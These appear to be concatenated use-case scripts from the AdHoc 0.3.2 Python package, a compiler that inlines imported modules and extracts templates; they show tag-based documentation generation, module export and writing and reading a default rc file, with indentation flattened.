RtAdHoc.reset_delimiters(state)
example2 = RtAdHoc.section_tag_remove(example_raw, 'adhoc_x_full_doc')
# |:here:|
# @:adhoc_uncomment:@
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym1
# @:adhoc_template:@ -alt-sym1
# Alternate Tag Symbols
# ~~~~~~~~~~~~~~~~~~~~~
#
# Consider some detailed documentation::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-sym1')
RtAdHoc.write_source('-', example1)
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym2
# @:adhoc_template:@ -alt-sym2
#
# The raw template::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-sym2
template_raw = RtAdHoc.get_named_template('-doc', __file__)
# @:adhoc_template:@
# @:adhoc_indent:@
template_raw = RtAdHoc.get_named_template('-doc', None, example1)
print_template(RtAdHoc, '-alt-sym2')
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym3
# @:adhoc_template:@ -alt-sym3
#
# is easily split into parts of different scope::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-sym3
full_doc_tag_sym = 'adhoc_x_full_doc'
full_doc_tag = RtAdHoc.section_tag(full_doc_tag_sym)
# @:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-sym3')
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym4
# @:adhoc_template:@ -alt-sym4
#
# by removing all tagged detail sections::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-sym4
short_doc = RtAdHoc.remove_sections(template_raw, full_doc_tag_sym)
# @:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym4
# @:adhoc_template:@ -alt-sym4
#
# providing for a short summary::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-sym4')
RtAdHoc.write_source('-', short_doc)
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym5
# @:adhoc_template:@ -alt-sym5
#
# by extracting sub-templates::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-sym5
details = RtAdHoc.get_named_template('-details', None, template_raw, full_doc_tag)
# @:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym5
# @:adhoc_template:@ -alt-sym5
#
# providing for a details higlight::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-sym5')
RtAdHoc.write_source('-', details)
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym6
# @:adhoc_template:@ -alt-sym6
#
# and by removing sub-template tag lines::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-sym6
full_doc = RtAdHoc.section_tag_remove(template_raw, full_doc_tag_sym)
# @:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-sym6
# @:adhoc_template:@ -alt-sym6
#
# providing the full documentation (full_doc)::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-sym6')
RtAdHoc.write_source('-', full_doc)
# @:adhoc_uncomment:@
# |:here:|
# @:adhoc_uncomment:@
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-dlm1
# @:adhoc_template:@ -alt-dlm1
# Alternate Tag Delimiters
# ~~~~~~~~~~~~~~~~~~~~~~~~
#
# The same documentation tagged with different tag delimiters::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-dlm1')
RtAdHoc.write_source('-', example2)
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-dlm2
# @:adhoc_template:@ -alt-dlm2
#
# After getting the raw template::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# <:adhoc_template:@ -alt-dlm2
# @:adhoc_template:@ -alt-dlm2
template_raw = RtAdHoc.get_named_template('-doc', __file__)
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
template_raw = RtAdHoc.get_named_template('-doc', None, example2)
print_template(RtAdHoc, '-alt-dlm2')
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-dlm3
# @:adhoc_template:@ -alt-dlm3
#
# the delimiters are changed for the documentation detail sections::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-dlm3
full_doc_delimiters = ('@:', ':>')
state = RtAdHoc.set_delimiters(full_doc_delimiters)
# @:adhoc_template:@
# @:adhoc_indent:@
RtAdHoc.reset_delimiters(state)
print_template(RtAdHoc, '-alt-dlm3')
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-dlm4
# @:adhoc_template:@ -alt-dlm4
#
# and the same parts as with `Alternate Tag Symbols`_ are generated::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-dlm4
short_doc = RtAdHoc.remove_sections(template_raw, 'adhoc_template')
details = RtAdHoc.get_named_template('-details', None, template_raw)
full_doc = RtAdHoc.section_tag_remove(template_raw, 'adhoc_template')
# @:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-dlm4')
# @:adhoc_indent:@ -4
# <:adhoc_template:@ -alt-dlm5
# @:adhoc_template:@ -alt-dlm5
#
# It is good practice to restore the previous delimiter set::
#
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
# @:adhoc_indent:@ -0
# @:adhoc_template:@ -alt-dlm5
RtAdHoc.reset_delimiters(state)
# @:adhoc_template:@
# <:adhoc_template:@
# @:adhoc_indent:@
print_template(RtAdHoc, '-alt-dlm5')
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
if __name__ == '__main__':
as_module = False
main(sys.argv) and exit(0)
else:
as_module = True
if not as_module:
pass
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_005_nested.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_005_nested.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc005; then echo 'DIFF'; diff -u uc005 -; else echo 'STORE'; cat >uc005; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_005_nested_.py | use_case_005_nested_.py |
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Module Imports
# --------------
#
# Imported modules are optionally zipped and base64-encoded. They are
# automatically unpacked internally and set up as modules in
# sys.modules as required.
#
# They can also be unpacked via the :meth:`adhoc.AdHoc.extract` and
# :meth:`adhoc.AdHoc.get_named_template` mechanisms.
#
# The following Python script imports the module ``adhoc_test.sub``.
# This also triggers the import of ``adhoc_test``, which is therefore
# also included.
#
# Import compilation is recursive. I.e., if a module contains its own
# adhoc tags, they are also processed.
#
# .. note:: When exported, modules are not recreated at the original
# locations, but locally below the export directory.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
uc_descr_beg = (
'# <:' 'adhoc_uncomment:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
uc_descr_out = (
'# i:' 'adhoc_template:>\n'
)
uc_descr_end = (
'# o:' 'adhoc_template:>\n'
'# <:' 'adhoc_uncomment:>\n'
)
uc_code_beg = (
'# i:' 'adhoc_indent:> 4\n'
'# <:' 'adhoc_template:>\n'
)
uc_code_end = (
'# <:' 'adhoc_template:>\n'
'# i:' 'adhoc_indent:>\n'
)
macros = {
'uc_descr_beg': uc_descr_beg,
'uc_descr_out': uc_descr_out,
'uc_descr_end': uc_descr_end,
'uc_code_beg': uc_code_beg,
'uc_code_end': uc_code_end,
}
def main(argv):
'''compiler and help/example/documentation extractor'''
global RtAdHoc
RtAdHoc.macros = macros
if len(argv) > 1:
if argv[1].startswith('-h') or argv[1].startswith('--h'):
print(__doc__)
return 1
if (argv[1].startswith('--c')
or argv[1].startswith('--d')
or argv[1].startswith('--t')
or argv[1].startswith('--r')):
file_, source = RtAdHoc.std_source_param(__file__)
if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
compiled = source
source = RtAdHoc.export_source(source)
else:
if 'adhoc' not in globals():
# this will most certainly fail
from adhoc import AdHoc as RtAdHoc
RtAdHoc.macros = macros
compiled = None
if argv[1].startswith('--t'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('t:' 'adhoc', '<:' 'adhoc')
docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
if compiled is None:
compiled = RtAdHoc().compile(source.replace('u:' 'adhoc', '@:' 'adhoc'))
if argv[1].startswith('--r'):
import shutil
tdir = 'use_case_003_import_test'
tscript = 'use_case_003_import_.py'
cwd = os.getcwd()
if os.path.exists(tdir):
shutil.rmtree(tdir)
if not os.path.exists(tdir):
os.mkdir(tdir)
os.chdir(tdir)
RtAdHoc.write_source(tscript, compiled.replace('@:' 'adhoc', 'u:' 'adhoc'))
os.system(''.join((sys.executable, ' ', tscript)))
os.chdir(cwd)
if os.path.exists(tdir):
shutil.rmtree(tdir)
return 1
if argv[1].startswith('--c'):
RtAdHoc.write_source('-', compiled.replace('@:' 'adhoc', 'u:' 'adhoc'))
return 1
if argv[1].startswith('--d'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('i:' 'adhoc', '<:' 'adhoc')
docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
RtAdHoc.write_source('-', docu_input)
docu_input = RtAdHoc.activate_macros(compiled)
docu_input = docu_input.replace('i:' 'adhoc', '<:' 'adhoc')
docu_input = docu_input.replace('o:' 'adhoc', '<:' 'adhoc')
docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
docu_input = RtAdHoc.get_named_template(source=docu_input)
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
map(sys.stderr.write, ('error: unknown option `', str(argv[1]), '`\n'))
exit(1)
return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Uncompiled Script**
#
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
# o:adhoc_template:>
# @:adhoc_run_time:@
# o:adhoc_template:>
# @|:uc_code_end:|>
# i:adhoc_indent:> 4
# t:adhoc_template:>
# o:adhoc_template:>
# i:adhoc_template:>
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
except ImportError:
pass
sys.path = sys_path
# @:adhoc_disable:@
# i:adhoc_template:>
# o:adhoc_template:>
# t:adhoc_template:>
# i:adhoc_indent:>
# meta program
if __name__ == '__main__':
as_module = False
main(sys.argv) and exit(0)
else:
as_module = True
if not as_module:
pass
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``import adhoc_test.sub`` is marked for inclusion at compile time::
#
# @|:uc_descr_out:|>
# Module ``adhoc_test`` is prepared as module through
# :meth:`adhoc.AdHoc.import_` as requirement before module
# ``adhoc_test.sub`` in the compiled script. The original ``import``
# statement then finds the pre-imported versions::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
import adhoc_test.sub # @:adhoc:@ force
# <:adhoc_template:>
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Expected output is ``adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED: True``::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
print('adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED: '
+ str(adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED))
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Expected output is ``adhoc_test.ADHOC_TEST_IMPORTED: True``::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
print('adhoc_test.ADHOC_TEST_IMPORTED: '
+ str(adhoc_test.ADHOC_TEST_IMPORTED))
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Setup ``use_case_003_export`` as export directory::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
RtAdHoc.quiet = True
RtAdHoc.export_dir = 'use_case_003_export'
# <:adhoc_template:>
import shutil
if os.path.exists(RtAdHoc.export_dir):
shutil.rmtree(RtAdHoc.export_dir)
# <:adhoc_template:>
RtAdHoc.export(__file__)
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Show export results::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
if os.path.exists(RtAdHoc.export_dir):
for dir_, subdirs, files in os.walk(RtAdHoc.export_dir):
for file_ in sorted(files):
map(sys.stdout.write, (os.path.join(dir_, file_), '\n'))
# <:adhoc_template:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The uncompiled script effectively copies itself into ``use_case_003_export``,
# but does not create the ``adhoc_test`` module::
#
# use_case_003_export/use_case_003_import_.py
#
# @|:uc_descr_out:|>
# Besides the original version of itself, the compiled script also
# recreates ``adhoc_test`` and ``adhoc_test.sub`` in the export
# directory::
#
# use_case_003_export/use_case_003_import_.py
# use_case_003_export/adhoc_test/__init__.py
# use_case_003_export/adhoc_test/sub/__init__.py
#
# @|:uc_descr_end:|>
RtAdHoc.section_delimiters = sv
if os.path.exists(RtAdHoc.export_dir):
shutil.rmtree(RtAdHoc.export_dir)
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_003_import.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_003_import.py")))
# :ide: COMPILE: Run with --run-compiled
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --run-compiled")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc003; then echo 'DIFF'; diff -u uc003 -; else echo 'STORE'; cat >uc003; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_003_import_.py | use_case_003_import_.py |
# @|:uc_descr_beg:|>
# Template Extraction
# -------------------
#
# Templates are useful, if some code snippet is to be executed and
# should also be available to initialize, e.g., RC files.
#
# The following Python script defines a template ``~/.uc00.rc``, which
# is extracted, if it does not already exist.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
uc_descr_beg = (
'# <:' 'adhoc_uncomment:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
uc_descr_out = (
'# i:' 'adhoc_template:>\n'
)
uc_descr_end = (
'# o:' 'adhoc_template:>\n'
'# <:' 'adhoc_uncomment:>\n'
)
uc_code_beg = (
'# i:' 'adhoc_indent:> 4\n'
'# <:' 'adhoc_template:>\n'
)
"""
Code shown in all parts (indented 4).
"""
uc_code_end = (
'# <:' 'adhoc_template:>\n'
'# i:' 'adhoc_indent:>\n'
)
uc_code_ti_beg = (
'# t:' 'adhoc_template:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
"""
Code shown in template and input part.
"""
uc_code_ti_out = (
'# i:' 'adhoc_template:>\n'
)
"""
Code shown in output part.
"""
uc_code_ti_end = (
'# o:' 'adhoc_template:>\n'
'# t:' 'adhoc_template:>\n'
)
macros = {
'uc_descr_beg': uc_descr_beg,
'uc_descr_out': uc_descr_out,
'uc_descr_end': uc_descr_end,
'uc_code_beg': uc_code_beg,
'uc_code_end': uc_code_end,
'uc_code_ti_beg': uc_code_ti_beg,
'uc_code_ti_out': uc_code_ti_out,
'uc_code_ti_end': uc_code_ti_end,
}
def main(argv):
'''compiler and help/example/documentation extractor'''
global RtAdHoc
RtAdHoc.macros = macros
if len(argv) > 1:
if argv[1].startswith('-h') or argv[1].startswith('--h'):
print(__doc__)
return 1
if (argv[1].startswith('--c')
or argv[1].startswith('--d')
or argv[1].startswith('--t')):
file_, source = RtAdHoc.std_source_param(__file__)
if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
compiled = source
source = RtAdHoc.export_source(source)
else:
if 'adhoc' not in globals():
# this will most certainly fail
from adhoc import AdHoc as RtAdHoc
RtAdHoc.macros = macros
compiled = None
if argv[1].startswith('--t'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
if compiled is None:
compiled = RtAdHoc().compileFile(__file__, source)
if argv[1].startswith('--c'):
RtAdHoc.write_source('-', compiled)
return 1
if argv[1].startswith('--d'):
# switch to meta tags
sv = RtAdHoc.set_delimiters (('<:', ':>'))
docu_input = RtAdHoc.activate_macros(source)
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
RtAdHoc.write_source('-', docu_input)
docu_input = RtAdHoc.activate_macros(compiled)
docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
docu_input = RtAdHoc.get_named_template(source=docu_input)
RtAdHoc.write_source('-', docu_input)
RtAdHoc.reset_delimiters(sv)
return 1
map(sys.stderr.write, ('error: unknown option `', str(argv[1]), '`\n'))
exit(1)
return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# i:adhoc_indent:> 4
# @|:uc_code_ti_beg:|>
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
except ImportError:
pass
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# i:adhoc_indent:>
# meta program
if __name__ == '__main__':
as_module = False
main(sys.argv) and exit(0)
else:
as_module = True
if not as_module:
pass
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Setup of some default values, enclosed in a template declaration::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# u:adhoc_indent:@ -4
# @|:uc_code_ti_beg:|>
rc_file_name = '~/.uc00.rc'
# u:adhoc_template:@ ~/.uc00.rc
# -*- coding: utf-8 -*-
default_value = 'default'
another_value = 'other'
# u:adhoc_template:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# u:adhoc_indent:@
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Template extraction makes sure, that the file ``~/.uc00.rc`` exists,
# if the user's home directory is writable::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# @|:uc_code_ti_beg:|>
RtAdHoc.quiet = True
RtAdHoc.extract_templates(__file__)
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
RtAdHoc.section_delimiters = sv
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Read ``~/.uc00.rc``, if available, and define variables::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_ti_beg:|>
rc_file = os.path.expanduser(rc_file_name)
try:
rc_source = RtAdHoc.read_source(rc_file, decode=False)
exec(rc_source, globals(), locals())
except IOError:
pass
print('default_value: ' + default_value)
print('another_value: ' + another_value)
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_001_templates.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_001_templates.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc001; then echo 'DIFF'; diff -u uc001 -; else echo 'STORE'; cat >uc001; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_001_templates_.py | use_case_001_templates_.py |
def sformat(fmt, *args, **kwargs):
return fmt.format(*args, **kwargs)
def printe(*args, **kwargs):
sys.stderr.write(' '.join(args))
sys.stderr.write('\n')
dbg_comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (15))
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Use Cases
# =========
#
# The initial incentive for the :mod:`adhoc` compiler was to have a
# means for including development libraries that are not ready for
# `PyPI`_ (and maybe never will). (See `Module Imports`_).
#
# The problem with these libraries is that they are not available on
# all systems and may not be worth the effort of a full-blown
# :mod:`distutils` package.
#
# If the API is heavily in flux, it is also nice to be able to take an
# arbitrary stable snapshot without version fiddling and carry
# everything around in a self-contained single file script. This
# eliminates the need to follow API changes in support libraries
# immediately.
#
# Creating a Python script instead of an archive eliminates the
# installation step.
#
# Including the importer/extractor as verbatim code eliminates the
# need for a run-time system to be installed. (See `Generic AdHoc
# Initialization`_).
#
# Modifications of the main script can be made trivially.
#
# The export mechanism allows arbitrary modifications of the main
# script and all adhoc'ed imports.
#
# The ``adhoc.py`` compiler script is only needed, if an exported
# script should be compiled again.
#
# Non-Module `Included Files`_ and `Template Extraction`_ are logical
# expansions of the basic concept.
#
# .. note:: Self-referential stuff gets pretty hilarious after a while
# ... The script for generating the use case documentation has
# some two and a half layers of template tagging ``:)``
#
# .. _`PyPI`: http://pypi.python.org
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Generic AdHoc Initialization
# ----------------------------
#
# If only automatic import and unpacking features are used, the
# standard initialization with a |adhoc_run_time| tag is sufficient.
# This includes the export, extract and template features, if only
# used in the compiled script.
#
# However, it is convenient that the uncompiled, compiled and exported
# versions of a script behave identically (especially for templates).
# That is the purpose of this generic initialization example.
#
# The use case documentation generator scripts contain an example
# :func:`main` function, which compiles/uncompiles the script on
# demand.
#
# A more complete example can be found in the command line argument
# evaluation part of the :func:`main` function in
# ``namespace_dict.py``
#
# The most complex example is available in the command line argument
# evaluation part of the :func:`main` function in ``adhoc.py``.
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Tag Description
# --------------------------------------------------
# u:adhoc_
# standard tag replacement to avoid template generation on
# extraction.
#
# <:adhoc_
# meta tags for example template
#
# i:adhoc_
# meta tags for input documentation
#
# o:adhoc_
# meta tags for output documentation
#
# t:adhoc_
# example template indent
#
# --------------------------------------------------
# |||:sec:||| Document Macros
# --------------------------------------------------
# Usage of input/output description sections:
#
# @|: uc_descr_beg :|>
#
# Describe input
#
# @|: uc_descr_out :|>
#
# Describe output
#
# @|: uc_descr_end :|>
# @:adhoc_template:@ -macros
uc_descr_beg = (
'# <:' 'adhoc_uncomment:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
# @:adhoc_template:@
"""
**Complete Example**
Macro::
# @|:uc_descr_beg...:|>
# INPUT
# @|:uc_descr_out...:|>
# OUTPUT
# @|:uc_descr_end...:|>
Effective input source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# INPUT
# <:adhoc_template...:>
# OUTPUT
# <:adhoc_uncomment...:>
Effective output source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# <:adhoc_template...:>
# INPUT
# <:adhoc_template...:>
# OUTPUT
# <:adhoc_template...:>
# <:adhoc_uncomment...:>
**uc_descr_beg Only**
Effective input source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
Effective output source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# <:adhoc_template...:>
"""
# @:adhoc_template:@ -macros
uc_descr_out = (
